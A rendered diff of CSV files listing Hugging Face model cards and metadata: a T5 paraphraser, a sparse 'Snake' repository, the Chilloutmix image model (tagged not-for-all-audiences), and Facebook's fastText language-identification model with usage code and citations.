- Educational tools
|
| 282 |
+
|
| 283 |
+
## How to Use
|
| 284 |
+
|
| 285 |
+
To use the model, install the Hugging Face `transformers` library and follow these steps:
|
| 286 |
+
|
| 287 |
+
```python
|
| 288 |
+
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
|
| 289 |
+
|
| 290 |
+
# Load the model and tokenizer
|
| 291 |
+
model_name = ""jaesani/chat_gpt_and_t5_base_paraphraser""
|
| 292 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 293 |
+
model = AutoModelForSeq2SeqLM.from_pretrained(model_name)
|
| 294 |
+
|
| 295 |
+
def paraphrase(question, max_length=128):
|
| 296 |
+
input_ids = tokenizer(f'paraphrase: {question}', return_tensors=""pt"", padding=""longest"", max_length=max_length, truncation=True).input_ids
|
| 297 |
+
outputs = model.generate(input_ids, max_length=max_length)
|
| 298 |
+
return tokenizer.decode(outputs[0], skip_special_tokens=True)
|
| 299 |
+
|
| 300 |
+
# Example usage
|
| 301 |
+
paraphrased_text = paraphrase(""What are the best places to see in New York?"")
|
| 302 |
+
print(paraphrased_text)
|
| 303 |
+
```
|
| 304 |
+
|
| 305 |
+
## Training Data
|
| 306 |
+
The model was fine-tuned using the Quora Question-Answer Dataset, which consists of pairs of questions that may or may not be paraphrases of each other.
|
| 307 |
+
|
| 308 |
+
## Evaluation
|
| 309 |
+
The model's performance can be evaluated based on the diversity and coherence of the paraphrases it generates. Specific metrics can include BLEU scores and human evaluations for semantic similarity.
|
| 310 |
+
|
| 311 |
+
## Limitations
|
| 312 |
+
The model may produce paraphrases that are not contextually relevant.
|
| 313 |
+
It may struggle with highly technical or domain-specific language.
|
| 314 |
+
Generated paraphrases might be similar for closely related input questions.
|
| 315 |
+
|
| 316 |
+
## License
|
| 317 |
+
This model is licensed under MIT License.","{""id"": ""jaesani/chat_gpt_and_t5_base_paraphraser"", ""author"": ""jaesani"", ""sha"": ""0f3920cd77c4ed19eccdeba60dbc0cf7b4a4f23b"", ""last_modified"": ""2024-09-20 13:34:56+00:00"", ""created_at"": ""2024-09-20 13:17:03+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 8, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""t5"", ""text2text-generation"", ""paraphrasing"", ""T5"", ""text generation"", ""NLP"", ""en"", ""dataset:mteb/quora"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:mit"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- mteb/quora\nlanguage: en\nlibrary_name: transformers\nlicense: mit\nmetrics:\n- accuracy\ntags:\n- paraphrasing\n- T5\n- text generation\n- NLP\n- transformers\nthumbnail: https://example.com/thumbnail.png"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 222903552}, ""total"": 222903552}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-09-20 13:34:56+00:00"", ""cardData"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- mteb/quora\nlanguage: en\nlibrary_name: transformers\nlicense: mit\nmetrics:\n- accuracy\ntags:\n- paraphrasing\n- T5\n- text generation\n- NLP\n- transformers\nthumbnail: https://example.com/thumbnail.png"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""66ed75cf381b19003609784e"", ""modelId"": ""jaesani/chat_gpt_and_t5_base_paraphraser"", ""usedStorage"": 892441544}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=jaesani/chat_gpt_and_t5_base_paraphraser&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bjaesani%2Fchat_gpt_and_t5_base_paraphraser%5D(%2Fjaesani%2Fchat_gpt_and_t5_base_paraphraser)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 318 |
+
TimeDom/Snake,"---
|
| 319 |
+
license: openrail
|
| 320 |
+
datasets:
|
| 321 |
+
- nvidia/HelpSteer2
|
| 322 |
+
language:
|
| 323 |
+
- ru
|
| 324 |
+
metrics:
|
| 325 |
+
- bleurt
|
| 326 |
+
base_model:
|
| 327 |
+
- humarin/chatgpt_paraphraser_on_T5_base
|
| 328 |
+
new_version: nvidia/Llama-3.1-Nemotron-70B-Instruct-HF
|
| 329 |
+
pipeline_tag: fill-mask
|
| 330 |
+
library_name: diffusers
|
| 331 |
+
tags:
|
| 332 |
+
- legal
|
| 333 |
+
---","{""id"": ""TimeDom/Snake"", ""author"": ""TimeDom"", ""sha"": ""73af8a6e4e6282a80df56685d231b1a40b7e493d"", ""last_modified"": ""2024-11-15 01:48:54+00:00"", ""created_at"": ""2024-11-15 01:45:32+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""legal"", ""fill-mask"", ""ru"", ""dataset:nvidia/HelpSteer2"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:openrail"", ""region:us""], ""pipeline_tag"": ""fill-mask"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- nvidia/HelpSteer2\nlanguage:\n- ru\nlibrary_name: diffusers\nlicense: openrail\nmetrics:\n- bleurt\npipeline_tag: fill-mask\ntags:\n- legal\nnew_version: nvidia/Llama-3.1-Nemotron-70B-Instruct-HF"", ""widget_data"": [{""text"": ""\u041c\u0435\u043d\u044f \u0437\u043e\u0432\u0443\u0442 <mask> \u0438 \u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440 \u0436\u0438\u0432\u0443\u0449\u0438\u0439 \u0432 \u041d\u044c\u044e-\u0419\u043e\u0440\u043a\u0435.""}], ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-15 01:48:54+00:00"", ""cardData"": ""base_model:\n- humarin/chatgpt_paraphraser_on_T5_base\ndatasets:\n- nvidia/HelpSteer2\nlanguage:\n- ru\nlibrary_name: diffusers\nlicense: openrail\nmetrics:\n- bleurt\npipeline_tag: fill-mask\ntags:\n- legal\nnew_version: nvidia/Llama-3.1-Nemotron-70B-Instruct-HF"", ""transformersInfo"": null, ""_id"": ""6736a7bc3890521c633dbef2"", ""modelId"": ""TimeDom/Snake"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=TimeDom/Snake&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTimeDom%2FSnake%5D(%2FTimeDom%2FSnake)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
chilloutmix_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
@@ -0,0 +1,63 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
swl-models/chilloutmix,"---
|
| 3 |
+
license: creativeml-openrail-m
|
| 4 |
+
duplicated_from: Chillout2023/Chilloutmix
|
| 5 |
+
tags:
|
| 6 |
+
- not-for-all-audiences
|
| 7 |
+
---
|
| 8 |
+
|
| 9 |
+
Civitai::https://civitai.com/models/6424/chilloutmix
|
| 10 |
+
|
| 11 |
+
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
Merged ""Basilmix""(nuigurumi/basil_mix · Hugging Face)
|
| 15 |
+
|
| 16 |
+
and
|
| 17 |
+
|
| 18 |
+
wonderful realistic models.
|
| 19 |
+
|
| 20 |
+
(PoV Skin Texture - r34 Lucid Black | Stable Diffusion Checkpoint | Civitai
|
| 21 |
+
|
| 22 |
+
PoV Skin Texture - Dreamlike r34 | Stable Diffusion Checkpoint | Civitai
|
| 23 |
+
|
| 24 |
+
by twilightBOO)
|
| 25 |
+
|
| 26 |
+
Use vae-ft-mse-840000
|
| 27 |
+
|
| 28 |
+
I think this model is Good for realistic Asian girls's nsfw pose. (...........now, You chill out.)
|
| 29 |
+
|
| 30 |
+
I prefer to use ""Ulzzang-6500"" embeddings (all samples)
|
| 31 |
+
|
| 32 |
+
↓
|
| 33 |
+
|
| 34 |
+
https://www.reddit.com/r/sdnsfw/comments/yv8d3l/embedding_i_trained_for_korean_ulzzang_face/
|
| 35 |
+
|
| 36 |
+
https://moritz.pm/files/ulzzang-6500.pt
|
| 37 |
+
|
| 38 |
+
https://oo.pe/https://moritz.pm/files/ulzzang-6500.pt
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
|
| 42 |
+
|
| 43 |
+
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
|
| 44 |
+
|
| 45 |
+
Due to using Dreamlike Diffusion 1.0, this model has the following license:
|
| 46 |
+
|
| 47 |
+
License
|
| 48 |
+
|
| 49 |
+
This model is licesed under a modified CreativeML OpenRAIL-M license.
|
| 50 |
+
|
| 51 |
+
- You can't host or use the model or its derivatives on websites/apps/etc., from which you earn, will earn, or plan to earn revenue or donations. If you want to, please email us at contact@dreamlike.art
|
| 52 |
+
|
| 53 |
+
- You are free to host the model card and files (Without any actual inference or finetuning) on both commercial and non-commercial websites/apps/etc. Please state the full model name (Dreamlike Diffusion 1.0) and include a link to the model card (https://huggingface.co/dreamlike-art/dreamlike-diffusion-1.0)
|
| 54 |
+
|
| 55 |
+
- You are free to host the model or its derivatives on completely non-commercial websites/apps/etc (Meaning you are not getting ANY revenue or donations). Please state the full model name (Dreamlike Diffusion 1.0) and include a link to the model card (https://huggingface.co/dreamlike-art/dreamlike-diffusion-1.0)
|
| 56 |
+
|
| 57 |
+
- You are free to use the outputs of the model or the outputs of the model's derivatives for commercial purposes in teams of 10 or less
|
| 58 |
+
|
| 59 |
+
- You can't use the model to deliberately produce nor share illegal or harmful outputs or content
|
| 60 |
+
|
| 61 |
+
- The authors claims no rights on the outputs you generate, you are free to use them and are accountable for their use which must not go against the provisions set in the license
|
| 62 |
+
|
| 63 |
+
- You may re-distribute the weights. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the modified CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully) Please read the full license here: https://huggingface.co/dreamlike-art/dreamlike-diffusion-1.0/blob/main/LICENSE.md","{""id"": ""swl-models/chilloutmix"", ""author"": ""swl-models"", ""sha"": ""f1a650ab7be1299b970d80e37540c2489e07fd78"", ""last_modified"": ""2023-03-30 00:43:49+00:00"", ""created_at"": ""2023-02-04 12:34:09+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 271, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""not-for-all-audiences"", ""license:creativeml-openrail-m"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: creativeml-openrail-m\ntags:\n- not-for-all-audiences\nduplicated_from: Chillout2023/Chilloutmix"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-ema-bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-ema-fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-ema-fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-non-ema-bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-non-ema-fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix-non-ema-fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Chilloutmix.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-03-30 00:43:49+00:00"", ""cardData"": ""license: creativeml-openrail-m\ntags:\n- not-for-all-audiences\nduplicated_from: Chillout2023/Chilloutmix"", ""transformersInfo"": null, ""_id"": ""63de50c1edf447149391c5d1"", ""modelId"": ""swl-models/chilloutmix"", ""usedStorage"": 26417688653}",0,,0,,0,,0,,0,,0
|
deberta-v3-large_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
fasttext-language-identification_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
@@ -0,0 +1,143 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
facebook/fasttext-language-identification,"---
|
| 3 |
+
license: cc-by-nc-4.0
|
| 4 |
+
library_name: fasttext
|
| 5 |
+
tags:
|
| 6 |
+
- text-classification
|
| 7 |
+
- language-identification
|
| 8 |
+
---
|
| 9 |
+
|
| 10 |
+
# fastText (Language Identification)
|
| 11 |
+
|
| 12 |
+
fastText is an open-source, free, lightweight library that allows users to learn text representations and text classifiers. It works on standard, generic hardware. Models can later be reduced in size to even fit on mobile devices. It was introduced in [this paper](https://arxiv.org/abs/1607.04606). The official website can be found [here](https://fasttext.cc/).
|
| 13 |
+
|
| 14 |
+
This LID (Language IDentification) model is used to predict the language of the input text, and the hosted version (`lid218e`) was [released as part of the NLLB project](https://github.com/facebookresearch/fairseq/blob/nllb/README.md#lid-model) and can detect 217 languages. You can find older versions (ones that can identify 157 languages) on the [official fastText website](https://fasttext.cc/docs/en/language-identification.html).
|
| 15 |
+
|
| 16 |
+
## Model description
|
| 17 |
+
|
| 18 |
+
fastText is a library for efficient learning of word representations and sentence classification. fastText is designed to be simple to use for developers, domain experts, and students. It's dedicated to text classification and learning word representations, and was designed to allow for quick model iteration and refinement without specialized hardware. fastText models can be trained on more than a billion words on any multicore CPU in less than a few minutes.
|
| 19 |
+
|
| 20 |
+
It includes pre-trained models learned on Wikipedia and in over 157 different languages. fastText can be used as a command line, linked to a C++ application, or used as a library for use cases from experimentation and prototyping to production.
|
| 21 |
+
|
| 22 |
+
## Intended uses & limitations
|
| 23 |
+
|
| 24 |
+
You can use pre-trained word vectors for text classification or language identification. See the [tutorials](https://fasttext.cc/docs/en/supervised-tutorial.html) and [resources](https://fasttext.cc/docs/en/english-vectors.html) on its official website to look for tasks that interest you.
|
| 25 |
+
|
| 26 |
+
### How to use
|
| 27 |
+
|
| 28 |
+
Here is how to use this model to detect the language of a given text:
|
| 29 |
+
|
| 30 |
+
```python
|
| 31 |
+
>>> import fasttext
|
| 32 |
+
>>> from huggingface_hub import hf_hub_download
|
| 33 |
+
|
| 34 |
+
>>> model_path = hf_hub_download(repo_id=""facebook/fasttext-language-identification"", filename=""model.bin"")
|
| 35 |
+
>>> model = fasttext.load_model(model_path)
|
| 36 |
+
>>> model.predict(""Hello, world!"")
|
| 37 |
+
|
| 38 |
+
(('__label__eng_Latn',), array([0.81148803]))
|
| 39 |
+
|
| 40 |
+
>>> model.predict(""Hello, world!"", k=5)
|
| 41 |
+
|
| 42 |
+
(('__label__eng_Latn', '__label__vie_Latn', '__label__nld_Latn', '__label__pol_Latn', '__label__deu_Latn'),
|
| 43 |
+
array([0.61224753, 0.21323682, 0.09696738, 0.01359863, 0.01319415]))
|
| 44 |
+
```
|
| 45 |
+
|
| 46 |
+
### Limitations and bias
|
| 47 |
+
|
| 48 |
+
Even if the training data used for this model could be characterized as fairly neutral, this model can have biased predictions.
|
| 49 |
+
|
| 50 |
+
Cosine similarity can be used to measure the similarity between two different word vectors. If two two vectors are identical, the cosine similarity will be 1. For two completely unrelated vectors, the value will be 0. If two vectors have an opposite relationship, the value will be -1.
|
| 51 |
+
|
| 52 |
+
```python
|
| 53 |
+
>>> import numpy as np
|
| 54 |
+
|
| 55 |
+
>>> def cosine_similarity(word1, word2):
|
| 56 |
+
>>> return np.dot(model[word1], model[word2]) / (np.linalg.norm(model[word1]) * np.linalg.norm(model[word2]))
|
| 57 |
+
|
| 58 |
+
>>> cosine_similarity(""man"", ""boy"")
|
| 59 |
+
|
| 60 |
+
0.061653383
|
| 61 |
+
|
| 62 |
+
>>> cosine_similarity(""man"", ""ceo"")
|
| 63 |
+
|
| 64 |
+
0.11989131
|
| 65 |
+
|
| 66 |
+
>>> cosine_similarity(""woman"", ""ceo"")
|
| 67 |
+
|
| 68 |
+
-0.08834904
|
| 69 |
+
```
|
| 70 |
+
|
| 71 |
+
## Training data
|
| 72 |
+
|
| 73 |
+
Pre-trained word vectors for 157 languages were trained on [Common Crawl](http://commoncrawl.org/) and [Wikipedia](https://www.wikipedia.org/) using fastText. These models were trained using CBOW with position-weights, in dimension 300, with character n-grams of length 5, a window of size 5 and 10 negatives. We also distribute three new word analogy datasets, for French, Hindi and Polish.
|
| 74 |
+
|
| 75 |
+
## Training procedure
|
| 76 |
+
|
| 77 |
+
### Tokenization
|
| 78 |
+
|
| 79 |
+
We used the [Stanford word segmenter](https://nlp.stanford.edu/software/segmenter.html) for Chinese, [Mecab](http://taku910.github.io/mecab/) for Japanese and [UETsegmenter](https://github.com/phongnt570/UETsegmenter) for Vietnamese. For languages using the Latin, Cyrillic, Hebrew or Greek scripts, we used the tokenizer from the [Europarl](https://www.statmt.org/europarl/) preprocessing tools. For the remaining languages, we used the ICU tokenizer.
|
| 80 |
+
|
| 81 |
+
More information about the training of these models can be found in the article [Learning Word Vectors for 157 Languages](https://arxiv.org/abs/1802.06893).
|
| 82 |
+
|
| 83 |
+
### License
|
| 84 |
+
|
| 85 |
+
The language identification model is distributed under the [*Creative Commons Attribution-NonCommercial 4.0 International Public License*](https://creativecommons.org/licenses/by-nc/4.0/).
|
| 86 |
+
|
| 87 |
+
### Evaluation datasets
|
| 88 |
+
|
| 89 |
+
The analogy evaluation datasets described in the paper are available here: [French](https://dl.fbaipublicfiles.com/fasttext/word-analogies/questions-words-fr.txt), [Hindi](https://dl.fbaipublicfiles.com/fasttext/word-analogies/questions-words-hi.txt), [Polish](https://dl.fbaipublicfiles.com/fasttext/word-analogies/questions-words-pl.txt).
|
| 90 |
+
|
| 91 |
+
### BibTeX entry and citation info
|
| 92 |
+
|
| 93 |
+
Please cite [1] if using this code for learning word representations or [2] if using for text classification.
|
| 94 |
+
|
| 95 |
+
[1] P. Bojanowski\*, E. Grave\*, A. Joulin, T. Mikolov, [*Enriching Word Vectors with Subword Information*](https://arxiv.org/abs/1607.04606)
|
| 96 |
+
|
| 97 |
+
```markup
|
| 98 |
+
@article{bojanowski2016enriching,
|
| 99 |
+
title={Enriching Word Vectors with Subword Information},
|
| 100 |
+
author={Bojanowski, Piotr and Grave, Edouard and Joulin, Armand and Mikolov, Tomas},
|
| 101 |
+
journal={arXiv preprint arXiv:1607.04606},
|
| 102 |
+
year={2016}
|
| 103 |
+
}
|
| 104 |
+
```
|
| 105 |
+
|
| 106 |
+
[2] A. Joulin, E. Grave, P. Bojanowski, T. Mikolov, [*Bag of Tricks for Efficient Text Classification*](https://arxiv.org/abs/1607.01759)
|
| 107 |
+
|
| 108 |
+
```markup
|
| 109 |
+
@article{joulin2016bag,
|
| 110 |
+
title={Bag of Tricks for Efficient Text Classification},
|
| 111 |
+
author={Joulin, Armand and Grave, Edouard and Bojanowski, Piotr and Mikolov, Tomas},
|
| 112 |
+
journal={arXiv preprint arXiv:1607.01759},
|
| 113 |
+
year={2016}
|
| 114 |
+
}
|
| 115 |
+
```
|
| 116 |
+
|
| 117 |
+
[3] A. Joulin, E. Grave, P. Bojanowski, M. Douze, H. Jégou, T. Mikolov, [*FastText.zip: Compressing text classification models*](https://arxiv.org/abs/1612.03651)
|
| 118 |
+
|
| 119 |
+
```markup
|
| 120 |
+
@article{joulin2016fasttext,
|
| 121 |
+
title={FastText.zip: Compressing text classification models},
|
| 122 |
+
author={Joulin, Armand and Grave, Edouard and Bojanowski, Piotr and Douze, Matthijs and J{'e}gou, H{'e}rve and Mikolov, Tomas},
|
| 123 |
+
journal={arXiv preprint arXiv:1612.03651},
|
| 124 |
+
year={2016}
|
| 125 |
+
}
|
| 126 |
+
```
|
| 127 |
+
|
| 128 |
+
If you use these word vectors, please cite the following paper:
|
| 129 |
+
|
| 130 |
+
[4] E. Grave\*, P. Bojanowski\*, P. Gupta, A. Joulin, T. Mikolov, [*Learning Word Vectors for 157 Languages*](https://arxiv.org/abs/1802.06893)
|
| 131 |
+
|
| 132 |
+
```markup
|
| 133 |
+
@inproceedings{grave2018learning,
|
| 134 |
+
title={Learning Word Vectors for 157 Languages},
|
| 135 |
+
author={Grave, Edouard and Bojanowski, Piotr and Gupta, Prakhar and Joulin, Armand and Mikolov, Tomas},
|
| 136 |
+
booktitle={Proceedings of the International Conference on Language Resources and Evaluation (LREC 2018)},
|
| 137 |
+
year={2018}
|
| 138 |
+
}
|
| 139 |
+
```
|
| 140 |
+
|
| 141 |
+
(\* These authors contributed equally.)
|
| 142 |
+
|
| 143 |
+
","{""id"": ""facebook/fasttext-language-identification"", ""author"": ""facebook"", ""sha"": ""3af127d4124fc58b75666f3594bb5143b9757e78"", ""last_modified"": ""2023-06-09 12:39:43+00:00"", ""created_at"": ""2023-03-06 12:52:50+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 562430, ""downloads_all_time"": null, ""likes"": 227, ""library_name"": ""fasttext"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""fasttext"", ""text-classification"", ""language-identification"", ""arxiv:1607.04606"", ""arxiv:1802.06893"", ""arxiv:1607.01759"", ""arxiv:1612.03651"", ""license:cc-by-nc-4.0"", ""region:us""], ""pipeline_tag"": ""text-classification"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""library_name: fasttext\nlicense: cc-by-nc-4.0\ntags:\n- text-classification\n- language-identification"", ""widget_data"": [{""text"": ""I like you. I love you""}], ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""CohereLabs/aya_expanse"", ""kargaranamir/language-identification"", ""librarian-bots/dataset-language-detection-api"", ""kargaranamir/LangID-LIME"", ""YiyangLewisLu/facebook-fasttext-language-identification"", ""IllyrianSpace/aya_expanse"", ""dperales/ITACA_Insurance_Core_v4"", ""danielperales/ITACA_Insurace_NLP_v2"", ""Chuanming/facebook-fasttext-language-identification"", ""grabsky/facebook-fasttext-language-identification"", ""anzorq/lid"", ""SANCTVM/facebook-fasttext-language-identification"", ""davanstrien/dataset-language-prediction-api-literstar"", ""ZyrenthDev/language-identification"", ""futranbg/language_classiy"", ""haardik-20/language-identification"", ""NorHsangPha/fasttext-language-identification"", ""comqositi/facebook-fasttext-language-identification"", ""wzperson/facebook-fasttext-language-identification"", ""dsfsi/dsfsi-language-identification-spaces"", ""nishantb06/facebook-fasttext-language-identification"", ""jonathanjordan21/facebook-fasttext-language-identification"", ""dveneziani/facebook-fasttext-language-identification"", ""jeremierostan/Aya_For_Schools"", ""Anupam251272/AJ-Chat"", ""zulhijaya/facebook-fasttext-language-identification"", ""yukiakai/fasttext-language-identification"", ""samdo20/fasttext""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-06-09 12:39:43+00:00"", ""cardData"": ""library_name: fasttext\nlicense: cc-by-nc-4.0\ntags:\n- text-classification\n- language-identification"", ""transformersInfo"": null, ""_id"": ""6405e2229f5bb41f15e94b68"", ""modelId"": ""facebook/fasttext-language-identification"", ""usedStorage"": 1326211583}",0,,0,,0,,0,,0,"Chuanming/facebook-fasttext-language-identification, CohereLabs/aya_expanse, IllyrianSpace/aya_expanse, SANCTVM/facebook-fasttext-language-identification, YiyangLewisLu/facebook-fasttext-language-identification, anzorq/lid, danielperales/ITACA_Insurace_NLP_v2, dperales/ITACA_Insurance_Core_v4, grabsky/facebook-fasttext-language-identification, huggingface/InferenceSupport/discussions/new?title=facebook/fasttext-language-identification&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfacebook%2Ffasttext-language-identification%5D(%2Ffacebook%2Ffasttext-language-identification)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kargaranamir/LangID-LIME, kargaranamir/language-identification, librarian-bots/dataset-language-detection-api",13
|